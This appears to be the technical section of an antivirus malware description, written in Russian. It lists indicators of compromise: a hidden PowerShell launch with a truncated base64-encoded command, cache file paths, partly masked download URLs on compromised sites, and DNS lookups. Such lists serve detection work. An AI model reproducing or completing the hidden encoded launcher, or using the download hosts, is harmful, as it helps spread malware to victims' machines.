Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABZAGEAZgBmAHUAawBuAGIAZwBlAD0AJwBVAHQAbQBuAHUAeQByAHYAeQAnADsAJABLAGUAaABvAGwAbwBlAG4AdQBzAGIAIAA9ACAAJwA2ADIAOQAnADsAJABaAHYAZwBuAGsAZwB4AHEAdwBzAGcAPQAnAE4...
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- http://ma#####monkeymedia.com/wp-includes/certificates/toa3/
- http://mo###.##st.zinimedia.com/medias/g6tyo8023/
- http://la###opper.com/wp-content/uploads/2019/b0/
- DNS ASK ma#####monkeymedia.com
- DNS ASK mo###.##st.zinimedia.com
- DNS ASK gi####.zinimedia.com
- DNS ASK la###opper.com
- DNS ASK bo##fy.com
- DNS ASK me###tzaki.com